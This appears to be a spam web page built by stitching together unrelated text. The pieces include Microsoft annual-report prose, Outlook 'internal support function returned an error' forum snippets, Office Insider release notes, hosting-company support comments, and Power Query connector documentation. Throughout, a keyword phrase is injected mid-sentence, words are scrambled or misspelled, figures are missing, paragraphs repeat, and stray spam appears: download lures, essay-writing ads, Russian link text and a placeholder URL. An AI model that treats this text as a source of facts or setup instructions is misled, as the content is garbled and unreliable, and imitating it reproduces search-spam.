To accelerate this, we must enable a new category of developers—citizen developers—equipping domain experts with tools that are low-code or no-code to create solutions that solve their unique business needs and help them better collaborate with professional developers. With Power Platform, anyone can become a citizen developer, able to create an application, build a virtual agent, automate a workflow, and analyze data in hours or days, not weeks or months.

Power BI is the clear leader in business intelligence in the cloud. Power Virtual Agents enables anyone to build an intelligent bot with just a point and click. And Power Automate enables customers to automate manual business processes across both legacy and modern applications. Microsoft is empowering people and organizations to be productive and secure as they adapt to more fluid ways of working and learning. The PC has been mission-critical across work, school, and life to sustain productivity microsoft outlook 2016 an internal support function returned an error free a remote everything world.

More than 1 billion active devices now run Windows 10, and Office usage is higher than ever. And with Surface, we are reimagining every layer of the stack—from how we infuse AI from the silicon up, to device form factors, to the role of operating systems—investing across form and function to create new device categories. We think about the future of work through three vectors. First, we are creating a system of collaboration for every organization.

Second, learning in the flow of work will be increasingly important. A new Teams app will help organizations skill, reskill, and upskill employees, surfacing learning content from LinkedIn Learning and other content providers.

Dynamics is helping organizations in every industry digitize their business operations and make every part of their operations remote, from manufacturing, to supply-chain management, to sales and customer service, including new scenarios like contactless shopping.

As much as 73 percent of the data in the world is still not being analyzed. And from Dynamics Customer Insights for personalized customer experiences and Functioon Commerce for omnichannel retail, Dynamics is the only AI-powered business cloud that gives customers a degree view of their business to unify data and unlock ourlook.

And the combination of LinkedIn Sales Navigator and Dynamics gives sales professionals tools for more effective remote selling. LinkedIn is where more than million professionals around the world go to connect, learn, and plan for the future. People are turning to LinkedIn Learning more than ever to acquire new skills.

And we are helping organizations attract, retain, and develop the best talent with our portfolio of Talent Solutions, Talent Insights, and Glint.

Identity, security, management, and compliance underlie our entire tech stack. We are the only company that offers integrated, end-to-end capabilities to protect people and organizations.

In identity, Azure Active Directory now provides identity and access management to more than million monthly active users across more thanorganizations. In security, Defender offers broad micgosoft, spanning identities, cloud apps, devices, IoT, and more. It complements Azure Sentinel, which analyzes security signals across the entire organization, using AI to detect, investigate, and automatically remediate threats.

And, in compliance, we provide tools to help organizations govern their data and comply with increasing regulatory requirements. Gaming is the most expansive category in the entertainment industry.

Three billion people around the world look to gaming for entertainment, community, and achievement, and our ambition is to empower each of them, wherever they play. We saw record engagement and monetization this year, microsoft outlook 2016 an internal support function returned an error free by strength on and off console, as people everywhere turn to gaming to connect, socialize, and play with their friends during a time of social distancing.

Our Xbox Game Pass service now has more than 15 million subscribers. As we pursue outlopk mission, we also recognize our enormous responsibility to ensure the technology we build benefits everyone on the planet, including the planet itself. Our customers see this urgent need and are micfosoft to us—in partnership with them—to take action. First, we must ensure that the economic growth we drive is inclusive.

This starts with protecting public health. COVID has underscored that without a healthy society, we cannot sustain a healthy economy. It also requires that we equip everyone with the skills, technology, and opportunity to pursue the in-demand jobs of a changing economy.

COVID has intensified the need for these efforts, forcing tens of millions of people out of work. We are also working to expand broadband access to 40 million unserved and underserved people in rural areas globally, and to 3 million people in unserved and rural communities in the US by July We also prioritize accessibility in our culture, products, and services, ensuring we use technology to design a more accessible world for the 1 billion-plus people around the world 20166 disabilities.

As we continue our own accessibility journey, we seek to inspire and enable others to advance theirs, including through our five-year investment in AI for Accessibility. We make our technology affordable microsoft outlook 2016 an internal support function returned an error free accessible to nonprofit organizations around the world, enabling them to drive greater impact for the causes and communities they serve.

Second, we unequivocally support the fundamental rights of all peoplefrom defending ouylook to addressing systemic racial injustice and inequity around the world. Recent events are shining functiion bright light on how much work there is still to do.

Seeing injustice in the world calls us all to take action. This http://replace.me/750.txt with our own culture at Microsoft, extends to how we engage our suppliers and partners to create change, and includes strengthening our communities. Democracy itself is intrrnal attack. Third, we must protect our most finite resource—the planet—by working toward a more sustainable future. Addressing the climate crisis is good for the planet and good for Microsoft.

Finally, we are committed to building trust in technology and its use. Without trust, none of our progress is possible. For Errro, trust is built on privacy, security, the responsible microsoft outlook 2016 an internal support function returned an error free of AI, and transparency.

Our approach to privacy and data protection is grounded in our belief that customers own their own data. Our privacy principles include a commitment to be transparent in our privacy practices, to offer meaningful privacy choices, and to responsibly manage the data we store and sn. To date, more than 43 million people have visited these tools. Security is a central challenge in the digital age. In an increasingly complex world, technology alone is not enough to combat increasing threats.

It also requires partnerships, both with governments and microsoft outlook 2016 an internal support function returned an error free.

Our Digital Crimes Unit—an international team of technical, legal, and business experts—has coordinated with partners across countries to disrupt threats targeting governments, universities, human rights organizations, individuals, and more. This year, for example, they took control of domains being used to send COVIDthemed frde emails in 62 countries.

Dec 18,  · I have a user who is trying to send an email to a group from his contacts in Outlook He receives the following error “an internal support function returned an. Oct 16,  · WHAT I TRIED THAT DIDN’T WORK. 1. rebooted. 2. repaired the Outlook profile. 3. recreated the Outlook profile. 4. ran a repair on Office 5. Uninstalled Office and reinstalled. Spice (9) Reply (6) flag Report. Outlook, Word Microsoft Editor gets an upgrade for Word and Outlook desktop clients. We are introducing a new click-to-review model for Editor’s spelling,grammar and advanced style suggestions. This change also includes a new dedicated card surface for reviewing the suggestions. Learn more. Outlook Pin your emails.
Thanks for the reply. Can the autocomplete cache be reset or deleted programmatically from PowerShell? Selecting something by mouse is not an option, as the whole point of the exercise is to automate things to make sure the message is sent to the correct distribution list. Sep 14,  · (b) (h) Revenue $ , $ 96, $ 91, $ 93, $ 86, Gross margin: 72, 62, driven by higher revenue from Premier Support Services and Microsoft Consulting Services, offset in part by a decline in revenue from custom support agreements. Deloitte & Touche LLP and the internal auditors each have full and. Account Type: Select POP3 or IMAP if you are not sure of the difference please see our article on POP3 vs. IMAP; Incoming Mail Server: enter replace.me (be sure to replace replace.me with your actual domain name); Outgoing Mail Server (SMTP): enter replace.me (be sure to replace replace.me with your actual domain name) User Name: Enter in the full email . Jan 04,  · I am trying to send out an email for a nonprofit to a group distribution list. Every time I hit send, I get an “internal support function returned an error” message, with no explanation or options. Any idea how to get past this? I am not very techie so please give me good details for how to fix. Ugh, very frustrating. Thanks! We also give discounts for returned customers are we have returned customer discounts. We deliver papers as early as after 3 hours of ordering. You only have to indicate the short deadline and our support team will help pick the best and most qualified writer in your field. The writer will confirm whether they will submit the paper within.

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Every week or month depending on your Insider levelwe’ll highlight interesting new features, important fixes, and any significant issues we want you to know about. We often roll out features to Insiders over a period to ensure that things are working smoothly. So, if you don’t see something described here, don’t worry, you’ll get it eventually.

Need the latest Insider build? Start here. Many Teams users wanted a way to quickly get feedback from meeting attendees on how satisfied they were or how well they understood the meeting content. Meeting owners can easily create and launch Rating polls to increase engagement and collect input from their meeting attendees, as well as share the results in real time. To create a Rating poll question, simply select Rating when creating a new poll in Teams.

The new Notifications pane in Outlook delivers notifications that are relevant to you in the context of your regular email.

The pane gives you the ability to customize the types of notifications you wish to receive, including email and document mentions, travel updates, microsoft outlook 2016 an internal support function returned an error free, and more. To turn on the new pane, simply select the Notifications icon at the top-right corner of your Outlook window. Note: This feature is microsoft outlook 2016 an internal support function returned an error free available only to enterprise customers.

Learn more. We delivered! SketchUp is a popular 3D graphics program that makes it easy to create shareable conceptual designs, such as fully textured architectural models and other graphics used in industrial design, product design, and civil and mechanical engineering.

Now, for the first time, SketchUp graphics. Transcribing data from paper into Excel can be a slow and frustrating process. Now you can, with the Data from Picture feature! To take advantage of this powerful feature, simply go to the Data tab and select From Picturethen choose the microsoft outlook 2016 an internal support function returned an error free you can also review and correct the data, if necessary, before inserting it into your worksheet. Any documents shared with you will automatically show up in your list; typically, the most relevant documents to you appear at the top of the list.

To experience this feature, simply click on the Home tab or the Open tab and select Shared with Me. The Office Dictation toolbar has been redesigned, featuring new visuals, a more responsive user interface, and a smaller size to stay out of the way of what matters—your content! To activate the new dictation toolbar, simply click the Dictate button on the Home tab.

The total number of responses allowed on an individual form or quiz in Forms has been increased from 50, to 5 million. This change eliminates the need to use multiple forms to collect more than 50, responses. Form owners can now gather up to 5 million responses on a single form, and can also export the results as a.

Using your editplus free for windows 10 to dictate content is a microsoft office professional plus 2016 greek free download free download, hands-free way of putting your thoughts into a note—shown to be three times faster than typing!

With Dictate for OneNote, now you can simply speak your thoughts to create content. To access this feature, just add premiere cc 2018 free download on the Dictate microphone icon on the home tab and begin dictating your notes. On resource-constrained devices two cores or less and eight gigabytes of RAM or lessExcel has now by default made recalculation more optimal by running calculation on a single thread.

In most cases, users should see noticeably faster calculation on these devices. These optimizations are more noticeable on devices with slower memory or slower CPU-memory throughput, such as low-cost devices.

The AutoFilter function is now noticeably faster! The optimizations are especially noticeable on low-end devices that have less memory or slower CPU-to-memory throughput. This functionality, which was previously available in Office for microsoft outlook 2016 an internal support function returned an error free web, is now also an option for your Office desktop applications.

Prior to the improved experience, when users tried to refresh a PivotTable connected to a dataset that they did not have access to, nothing would happen.

Now, a dialog box appears that informs them that they do not have access to the dataset, and allows them to click a link to request access from the owner. Once access is granted, users can go back to the PivotTable and refresh to continue their analysis.

We fixed an issue where certain buttons in the ribbon would not draw correctly when the window was resized. We fixed an issue where the app would close unexpectedly as a result of PowerQuery data processing. We fixed an microsoft outlook 2016 an internal support function returned an error free with LET functions where больше на странице name argument was the microsoft outlook 2016 an internal support function returned an error free as the column reference and the row was absolute.

We fixed an issue so that modern charts will now show localized currency symbols when currency values are formatted. We fixed an issue where a reading pane could disappear when the user switched folders and was using a pinned web читать. We fixed an issue where the cursor would scroll to the end of the document after deleting a paragraph mark.

We fixed an issue where switching between Linear and Professional in LaTex equations could result in display errors. We fixed an issue related to specific example text which would display poorly due to the rich-edit HTML ignoring the HTML small element and not resetting the character format masks at the end of a hyperlink.

Recommended PivotTables microsoft outlook 2016 an internal support function returned an error free now more intelligent and easier to use! The dialog box interface has been replaced by a redesigned panel, making it easier to view all of your options and simpler to change your data selection before inserting a recommended PivotTable. Review the recommendations and insert the one you want into your workbook. Modern comments in PowerPoint offer many enhancements that improve the collaboration process on your presentation, including comments anchored to specific text, comments visible in the margin and in the comments pane, the ability to resolve threads, enhanced mentions functionality, and more.

Previously limited to commercial licenses of Office, modern comments are activesync windows 10 available to the PowerPoint consumer audience as well! Collaborating with others while working in Word is a vital productivity tool for many users, and disruptions can be extremely frustrating.

Conflicts between different authors and changes not saved to the server will show as tracked changes. No longer! Many users have requested improvements for PivotTables connected to Power BI datasets, enabling easy drag-and-drop aggregations by dragging fields into the Values area of the PivotTable. This work builds on recent improvements that make it easier to create Power BI-connected PivotTables without having to leave Excel. You asked for it! Outlook has traditionally supported receiving email at addresses other than your default address known as a proxy address, or alias.

Now you can send mail from those proxy accounts as well by choosing the desired outgoing address. In the message window, click the arrow on the right side of the From button and choose Manage List.

You can then add additional From addresses to the dropdown menu. Compose your email, and then click the Send button. Note that your tenant admin must enable this feature to make it available to users. Dropdown lists are a handy way to make data entry and validation more efficient in Excel. Up until now, default sensitivity labels, configured by your administrator, were automatically applied when a file was created.

Now, labels are applied whenever a document, worksheet, or presentation is either created or modified. Note that you can select a different label if one better matches the sensitivity of a given file. With the new Record experience in PowerPoint, you can make your presentations more impactful by recording videos with narration, enabling you to tell the story in your words. This feature allows you to bring all the components of the presentation together for easy sharing and viewing.

The exportable video includes all recorded timings, narrations, ink, and laser pointer gestures, and also preserves any animations, transitions, and media. To enter the new experience, click the Record button in the top app bar, or click the Record tab and then select From Beginning or From Current Slide. Making your presentation accessible to people with disabilities requires knowledge, compassion, and special tools.

The new Accessibility ribbon in PowerPoint helps you accomplish this by по ссылке all the tools you need together in one place. To open the Accessibility ribbon, click Check Accessibility on the Review tab.

Now when you open your own profile card, a new link appears under your name and title. Click on Update your photo to go to the web page where you can change the photo associated with your profile.

In our increasingly busy world, dictating your emails in Outlook has become a very popular way to improve your efficiency. To use this feature, click the Dictate button on the Message tab for an email. Additional sensitive information types configured as part of OneDrive and SharePoint data loss prevention DLP policies can now be detected by the app to show a policy tip.

This update also brings accuracy improvements and globalization support. The ODF 1. Now you can show multiple months both horizontally and ссылка на страницу in the Calendar To-Do bar. Collaborating with others is a key part of producing great content in Word, and the Track Changes feature is an essential part of that process.

But sometimes you only want your own changes to be tracked, without forcing this setting on others. To do so, go to the Review tab and open the dropdown menu on the Track Changes button; then select Just Mine. WebP is a modern image format that offers better compression for publishing images to the web.

Gain a clearer view of complex workbooks with the new Navigation pane feature. When adding an account to Outlook, a link to create a new Outlook. Outlook makes it easy to reply faster to emails by offering short suggested replies for messages that can be answered with just a few words. The Read Aloud feature in Word and Outlook is great for authors and readers alike.

To switch between different voice options, select the Settings icon at the upper-right corner of your message or document and click the Voice Selection drop-down menu.

Note: You must be connected to the internet to access this feature. Using your voice to accomplish tasks is becoming more and more common in many productivity apps. Now you can use your microsoft outlook 2016 an internal support function returned an error free to search within Word; find commands, content, and more without typing a thing. To use this feature, click the microphone icon in the Search bar at the top of your Word document, then speak your search terms.

Outlook clients that use built-in labeling will now also enforce the existing PowerShell label policy advanced settings DisableMandatoryInOutlook and OutlookDefaultLabel, previously supported only by the Azure Information Protection unified labeling client. If you have already configured these settings for your organization, they will now be enforced in Outlook clients. Immersive Reader is an Office tool that allows you to better focus on your content.

This tool adjusts the text spacing, colors, column widths, and more, and uses line focusing to highlight the content being read.

Review the recommendations and insert the one you want into your workbook. Modern comments in PowerPoint offer many enhancements that improve the collaboration process on your presentation, including comments anchored to specific text, comments visible in the margin and in the comments pane, the ability to resolve threads, enhanced mentions functionality, and more.

Previously limited to commercial licenses of Office, modern comments are now available to the PowerPoint consumer audience as well! Collaborating with others while working in Word is a vital productivity tool for many users, and disruptions can be extremely frustrating.

Conflicts between different authors and changes not saved to the server will show as tracked changes. No longer! Many users have requested improvements for PivotTables connected to Power BI datasets, enabling easy drag-and-drop aggregations by dragging fields into the Values area of the PivotTable. This work builds on recent improvements that make it easier to create Power BI-connected PivotTables without having to leave Excel.

You asked for it! Outlook has traditionally supported receiving email at addresses other than your default address known as a proxy address, or alias. Now you can send mail from those proxy accounts as well by choosing the desired outgoing address. In the message window, click the arrow on the right side of the From button and choose Manage List.

You can then add additional From addresses to the dropdown menu. Compose your email, and then click the Send button. Note that your tenant admin must enable this feature to make it available to users. Dropdown lists are a handy way to make data entry and validation more efficient in Excel.

Up until now, default sensitivity labels, configured by your administrator, were automatically applied when a file was created. Now, labels are applied whenever a document, worksheet, or presentation is either created or modified. Note that you can select a different label if one better matches the sensitivity of a given file. With the new Record experience in PowerPoint, you can make your presentations more impactful by recording videos with narration, enabling you to tell the story in your words.

This feature allows you to bring all the components of the presentation together for easy sharing and viewing. The exportable video includes all recorded timings, narrations, ink, and laser pointer gestures, and also preserves any animations, transitions, and media. To enter the new experience, click the Record button in the top app bar, or click the Record tab and then select From Beginning or From Current Slide.

Making your presentation accessible to people with disabilities requires knowledge, compassion, and special tools. The new Accessibility ribbon in PowerPoint helps you accomplish this by bringing all the tools you need together in one place.

To open the Accessibility ribbon, click Check Accessibility on the Review tab. Now when you open your own profile card, a new link appears under your name and title.

Click on Update your photo to go to the web page where you can change the photo associated with your profile. In our increasingly busy world, dictating your emails in Outlook has become a very popular way to improve your efficiency. To use this feature, click the Dictate button on the Message tab for an email. Additional sensitive information types configured as part of OneDrive and SharePoint data loss prevention DLP policies can now be detected by the app to show a policy tip.

This update also brings accuracy improvements and globalization support. The ODF 1. Now you can show multiple months both horizontally and vertically in the Calendar To-Do bar. Collaborating with others is a key part of producing great content in Word, and the Track Changes feature is an essential part of that process. But sometimes you only want your own changes to be tracked, without forcing this setting on others.

To do so, go to the Review tab and open the dropdown menu on the Track Changes button; then select Just Mine. WebP is a modern image format that offers better compression for publishing images to the web. Gain a clearer view of complex workbooks with the new Navigation pane feature. When adding an account to Outlook, a link to create a new Outlook. Outlook makes it easy to reply faster to emails by offering short suggested replies for messages that can be answered with just a few words.

The Read Aloud feature in Word and Outlook is great for authors and readers alike. To switch between different voice options, select the Settings icon at the upper-right corner of your message or document and click the Voice Selection drop-down menu. Note: You must be connected to the internet to access this feature. Using your voice to accomplish tasks is becoming more and more common in many productivity apps. Now you can use your voice to search within Word; find commands, content, and more without typing a thing.

To use this feature, click the microphone icon in the Search bar at the top of your Word document, then speak your search terms. Outlook clients that use built-in labeling will now also enforce the existing PowerShell label policy advanced settings DisableMandatoryInOutlook and OutlookDefaultLabel, previously supported only by the Azure Information Protection unified labeling client. If you have already configured these settings for your organization, they will now be enforced in Outlook clients.

Immersive Reader is an Office tool that allows you to better focus on your content. This tool adjusts the text spacing, colors, column widths, and more, and uses line focusing to highlight the content being read. This highly popular feature in OneNote and Word is now available to users of Outlook for Windows desktop.

To access the feature, select the View menu and then click the Immersive Reader button. Outlook now features Org Explorer, a new app that enables you to contextualize, visualize, and explore the people and teams around you.

Outlook now tells you when and where you last signed into your account, and alerts you if any suspicious sign-in activity is detected. You can now use stencils with the latest AWS shapes to help you create diagrams and represent your AWS architecture more accurately. When composing an email to large audiences or external users, for example, accessibility violations will now be brought up to your attention, through a mailtip.

We fixed an issue to support backward compatibility with older versions of Excel. We fixed an issue where hyperlinks including digits would be broken when composing a message in Outlook in a right-to-left language.

When you go to tools then settings and you have a look at the account, new emails are getting delivered to another email address. We have tried to change the folder but there is no other option.

He can send from the new account and receive from the new email account but he wants to show this email address separately. What do we need to do? Thanks for the question. It sounds like you were able to set up the account okay per the instructions above. Outlook uses profiles for managing multiple accounts. You may need to set up a different profile in order to see the other account. Hi Guys i have a doubt i need to configure outlook.

I have configure on my lap but i want to configure on my android mobile phone my mail id is like [email protected] please help to configure on my Mobile Phone. We have a great article on setting up email on your Android phone that should resolve your issue. Hi I have configured gmail in outlook Can anyone helpme out to solve this issue.

Are you getting any errors when connecting? Have you tried deleted and recreated the account? Have you attempted using another email client such as Thunderbird to see if it is only an Outlook issue? When following these instructions my email will not let me send or receive anything. It only stays in the outbox instead of sent mail. I have successfully set up Outlook following your instructions but for some reason I am now getting this error when trying to send out emails.

What port are you using for your outgoing mail server? If using port 25, try changing it to port as your ISP may be blocking port Log onto incoming mail server POP3 : Cannot find the e-mail server. Thank you for contacting us about email connection issues. You can confirm your specific email settings in cPanel at any time. There are additional guides on the bottom. I am using outlook and in the last 2 weeks my mail is not clearing from the server and I have to change the quota to unlimited to receive mail.

It is getting frustrating that I have to change all the quotas on the accounts to unlimited to receive mail. Why are the messages not clearing from the server after being downloaded onto the outlook client…?? Thanks for the question and sorry for the confusion with the email. When you are using the IMAP protocol, email will stay on the server.

You can set Outlook to purge email marked for deletion, but email not marked for deletion will stay on the server. Also, the quota is not affected because email remains on the server. The quota is only affected when email accounts go beyond their set limits. If you want to your email account to download the email from the server, then you would use the POP3 protocol settings for email.

I hope this helps to clear things up. If you have any further questions or comments, please let us know. This issue about made me fall apart recently. Relized the solution to all of the weird functionlity was to set it up as a POP acct vs.

Thnaks, but that is set up correctly. I went over set up a few times to be sure. I had this set up before, but had to wipe out the computer and starting fresh. No luck with outgoing mail so far. Any other ideas? If you are certain that everything is configured correctly, you may need to contact technical support for further assistance.

Switched to port , but still having issues sending the mail. Mail comes, bu does not go out. This is typically caused by your mail client not fully authenticating as the user. To resolve the issue, follow the steps in our article on email authentication in Outlook.

Have you confirmed your email settings are correct? If you are hosted with us you can view your email settings at any time.

In case an outgoing email is stuck, have you tried deleting all outgoing emails, then attempting to resend one. Spam filter was deleting emails corrupt files in windows 7 folders also broke Dreamweaver so it was a busy Weekend, but appears to be OK now. What do you see in the Inbox when you log into the webmail directly? Do you see the emails that are not showing? After using live. As a result all of my old emails disappeared from live. Is ther any way to have the emails appear in both live and Outlook.

The best options may be to setup both accounts using the IMAP option. Just set up outlook Currently the emails are showing up grouped as one. There are already two separate accounts. If you want to manage 2 separate email accounts in Outlook you have two options. Create two different profiles, one for each mail account.

Add both mail accounts to one profile, then setup email filters to move them to separate folders. All the information are entered correctly. At the same time my emails goes to my webmail account.

But when i tried to login to my webmail account through google,it also could not connect. How are you trying to login to webmail? Because they both use IMAP in order to connect to the server and get messages. Such as the email address you are trying to connect with, and the mail server you are currently trying to use. No problem at all, glad that fixed your problem! It sounds like you may just have some incorrect settings defined there.

Be sure to check over all of your settings and that they match the settings provided within the Gmail POP documentation. Beside the very first section for E-Mail , click on E-mail Options…. Then simply click on OK to save the setting. Thanks for quick response They are using POP and there is only single mail showing in webmail but in outlook they got multiple mails and they are using dedicated PC for mail.

It certainly seems as if the mail client is pulling the messages down, then duplicating them after they are saved on your computer. Without looking directly at your Outlook configuration, I am unsure as to what exactly is causing it, but I recommend looking over all of your settings, and possibly removing and then re-adding the account to the client. Be sure that you back up your emails before you remove it if you do this as it will cause emails to become removed.

One of my team member getting double mails every time in inbox. I have cross check every thing which you mention above. No visus found in that pc. Please let me know how I can resolve the issue. Do they see the emails twice within webmail as well? Are they using multiple devices to check their email? Thank you for the link, I will save that for future use in future questions and possibly a new article.

So I guess I live with it. That did not help. In Outlook that path of options you gave from Google I assume does not exist. But that only lets you change the Sent folder. That is due to your Outlook having the default delivery location set to your local computer. You can set that location to be the server inbox, I believe you can do that in the following location:. I have a Personal Folders section with an empty Inbox, but items in my sent box.

And a separate section that has only my inbox, and that inbox has my email. There should only be 1 inbox, what is going on? Get web hosting from a company that is here to help. Sign up today! Community Blog. We also have a great guide on How to Setup Outlook to Check Your Email If you are unsure what your email settings are, you can find them with our Email Configuration tool. Hi, I m Using Outlook in my Windows 10 lap. I recently had a website hosting transfer completed.

Email accounts for the 3 websites which had the hosting transfer completed, all worked perfect through Outlook prior to the transfer. Since the website hosting transfer was completed, only email accounting on 1 of the domains websites are working. The other 2 websites that were transferred, those email accounts are no longer working.

I have gone through settings in WHM and Cpanel, I have gone through all the steps to set up mail client with registry edit and manual settings. Webmail works for these 2 domains but no settings with work through outlook. I have deleted the email account through cpanel and created new accounts, I have also deleted them from outlook and set them back up.

I recommend the following: 1 Check to make sure that domains that have been moved so that ALL traffic — web server and mail server- is going to the new hosting server. I hope that helps to resolve your problem! If you require further assistance please let us know!

Regards, Arnel C. My reciving mail server is error. I am using outlook The mail is configured and receiving the mails in inbox as well. Hi, Since Mar 22, , my Outlook in my laptop is not downloading any incoming emails. Thank you. Hi, I have one perticuler persion create a folder when he was send me to one mail so I have receive three mail so pls guide me to solve this problem. Hi, I am having a problem with my 0utlook email. Please help me. Please advise. Hello Malik, Sorry for the problems with the mail settings.

If you have any further questions, please let us know. Kindest regards, Arnel C. Hello Bev, Sorry for the issues with your email. Hello Experts, My outloook is downloading only Inbox mails skipping all the folders. Please let me know what settings do i have to make in order to download everything. Hi, As per your guideline I ve configure the outlook.

Hi, we are facing error when confiruging the email accout in Out Look. Please find below the error details and request us to help for the same. Assalamoalaikum, I configure roundcube in outlook through POP but thers no mail left in roundcube, all mails have been moved to outlook instead of copy.

Please any one can help me. Thanks for your post. Regards Vinay. Hi, In office I am using Outlook and at home i am using webmail. How can i synchronize sent item folder? Hello Asha, If your Outlook email client is properly configured to send email from the same mail server that your webmail service is attached to, then the outgoing email should be tracked at the server since it is sending the email — not Outlook. Please anyone will help on these!!

How can i resolve this? Regards Ninad. I just started using outlook 7 for a new email and have noticed that I am not getting all emails… how can I fix this and more importantly, is there a way I can recover those lost emails? Hello Gary, I advise you make sure that your domain is pointing to our servers.

Hello V N Murphy Did you subscribe to these folders? Kindest Regards, Scott M. Sir, Thank for your reply. Please guide me in this. Hello vnmurthy, Thank you for contacting us. I am using outlook , not and I configured as pop3 account.

Thank you, Sir, Thank for your reply. Hello VN Murthy, The method in the article for will be similar. Thank you, Leis. Hello Leis, Sorry for the problem with setting up your Live. Hello Mrs. Ong, Thank you for contacting us. If you have any further questions, feel free to post them below. Hello H K, Thank you for contacting us. Hello Hanu, Thank you for contacting us.

Thank you,. Hello Hamad, Thank you for contacting us. Cant open this item error is showing, windows 7, google apps sync, using, and outlook Hello Mahesh, Thank you for contacting us. I hope this helps, John-Paul. HI, i have a customer with outlook , a bigpond email address and im using POP and also using multiple devices, the problem im having is that old emails keep appearing and i keep receiving duplicates. Hello Simon, Thank you for contacting us.

You can still save copies of emails, by moving them to other folders. Hello redandy We do not have copies of Outlook to test, but if memory serves, there is an option in the left top menu that allows you to select which account you are viewing.

Plez help me. Hello Pramod, Thank you for contacting us. Hello Yahia, Thank you for your question. The setup went fine without any errors …but the issue I face is this : 1. My sent emails still reside in webmail and donot show up in Outlook. How do I make this sync. Regards, Ramesh. Hello Ramesh, Thank you for your question. Thanks, Dale. Hello Dale, Right click on any of the headers at the top of the list of e-mail messages and select Customize Current View and then click the Fields button.

Best Regards, TJ Edens. Hello ngo wah, Is it one particular folder on one particular account? Dear Sir I have 4 accounts in gescoservices. Hello Amanj, Sorry for the problems with email. Regards, Arnel c. Please help! Select the driver that matches your Power Query installation bit or bit. For more information, see Import data from a database using Native Database Query. For more information about advanced connector options, see MySQL database. Select the driver that matches your Office version bit or bit.

For more information, see Which version of Office am I using? Also make sure you have the provider registered in the machine configuration that matches the most recent. NET version on your device. For more information about advanced connector options, see PostgreSQL. Select the driver that matches your Excel installation bit or bit. By default, the Encrypt connection check box is selected so that Power Query connects to your database using a simple encrypted connection.

Note: Before you can connect to a Teradata database, you need the. This feature is only available in Excel for Windows if you have Office or later, or a Microsoft subscription.

If you are a Microsoft subscriber, make sure you have the latest version of Office. You will need an SAP account to login to the website and download the drivers.

If you are unsure, contact the SAP administrator in your organization. The server name should follow the format ServerName:Port. Optionally, if you want to import data using native database query, Select Advanced options and in the SQL Statement box enter the query. Azure SQL Database is a high-performing, fully managed, scalable relational database built for the cloud and used for mission-critical applications.

For more information about advanced connector options, see Azure SQL database. Azure Synapse Analytics combines big data tools and relational queries by using Apache Spark to connect to Azure data services and the Power Platform.

You can load millions of rows in no time. Then, you can work with tabular data by using familiar SQL syntax for queries.

For more information, see What is Azure Synapse Analytics. For more information about advanced connector options, see Azure Synapse Analytics.

Azure HDInsight is used for big data analysis when you need to process large amounts of data. It supports data warehousing and machine learning; you can think of it as a data flow engine.

Select your cluster in the Navigator dialog, and then find and select a content file. Select Load to load the selected table, or Edit to perform additional data filters and transformations before loading it.

If you are connecting to the Blob storage service for the first time, you will be prompted to enter and save the storage access key. Note: If you need to retrieve your storage access key, browse to the Microsoft Azure Portal , select your storage account, and then select the Manage Access Key icon on the bottom of the page.

Select the copy icon to the right of the primary key, and then paste the value in the Account Key box. The Azure Storage provides storage services for a variety of data objects. For more information, see Introduction to Table storage.

Azure Data Lake Storage Gen 1 combines different data warehouses into a single, stored environment. You can use a new generation of query tools to explore and analyze data, working with petabytes of data.

For more information, see Azure Data Lake Storage. Azure Data Explorer is a fast and highly scalable data exploration service for log and telemetry data.

It can handle large volumes of diverse data from any data source, such as websites, applications, IoT devices, and more. For more information, see What is Azure Data Explorer. In the Azure Data Explorer Kusto dialog box, enter appropriate values. Each prompt provides helpful examples to walk you though the process. You can import Datasets from your organization with appropriate permission by selecting them from the Power BI Datasets pane, and then creating a PivotTable in a new worksheet.

The Power BI Datasets pane appears. If many Datasets are available, use the Search box. Select the arrow next to the box to display keyword filters for versions and environments to target your search. Select a Dataset and create a PivotTable in a new worksheet. Select the 2. As an alternative to 2. For more information about advanced connector options, see SharePoint Online list. If you have many objects, use the Search box to locate an object or use he Display Options along with the Refresh button to filter the list.

Select or clear the Skip files with errors checkbox at the bottom of the dialog box. If you select the Advanced option, you can append certain additional parameters to the query to control what data is returned. If you aren’t signed in using the Microsoft Work or School account you use to access Dataverse for Apps, select Sign in and enter the account username and password.

The Salesforce Objects dialog box appears. Select either Production or Custom. If you select Custom , enter the URL of a custom instance.

For more information about advanced connector options, see Salesforce Objects. Because Salesforce Reports has API limits retrieving only the first 2, rows for each report, consider using the Salesforce Objects connector to work around this limitation if needed. The Salesforce Reports dialog box appears. For more information about advanced connector options, see Salesforce Reports. Make sure you have the latest version of the Adobe Analytics connector. Sign in with you Adobe Analytics Organizational account, and then select Connect.

For more information about advanced connector options, see Adobe Analytics. Select Advanced , and then In the Access Web dialog box, enter your credentials. For more information about advanced connector options, see Web. Microsoft Query has been around a long time and is still popular.

In many ways, it’s a progenitor of Power Query. For more information, see Use Microsoft Query to retrieve external data. By default, the most general URL is selected. Select Anonymous if the SharePoint Server does not require any credentials. Select Organizational account if the SharePoint Server requires organizational account credentials. For more information about advanced connector options, see SharePoint list. Select Marketplace key if the OData feed requires a Marketplace account key.

Click Organizational account if the OData feed requires federated access credentials. For Windows Live ID, log into your account. For more information about advanced connector options, see OData feed. HDFS connects computer nodes within clusters over which data files are distributed and you can access these data files as one seamless file stream. Enter the name of the server in the Server box, and then select OK. In the Active Directory Domain dialog box for your domain, select Use my current credentials , or select Use alternate credentials and then enter your Username and Password.

After the connection succeeds, use the Navigator pane to browse all the domains available within your Active Directory, and then drill down into Active Directory information including Users, Accounts, and Computers. In the next dialog box, select from Default or Custom , Windows , or Database connection options, enter your credentials, and then select Connect. In the Navigator pane, select the tables or queries that you want to connect to, then select Load or Edit.

For more information about advanced connector options, see ODBC data source. In the Navigator dialog box, select the database, and tables or queries you want to connect to, and then select Load or Edit. Important: Retirement of Facebook data connector notice Import and refresh data from Facebook in Excel will stop working in April, Note: If this is the first time you’ve connected to Facebook, you will be asked to provide credentials.

Sign in using your Facebook account, and allow access to the Power Query application. You can turn off future prompts by clicking the Don’t warn me again for this connector option. Note: Your Facebook username is different from your login email. Select a category to connect to from the Connection drop-down list. For example, select Friends to give you access to all information available in your Facebook Friends category.

If necessary, click Sign in from the Access Facebook dialog, then enter your Facebook email or phone number, and password. You can check the option to remain logged in. Once signed in, click Connect.

After the connection succeeds, you will be able to preview a table containing information about the selected category. For instance, if you select the Friends category, Power Query renders a table containing your Facebook friends by name. You can create a blank query. You might want to enter data to try out some commands, or you can select the source data from Power Query:. For more information, see Manage data source settings and permissions.

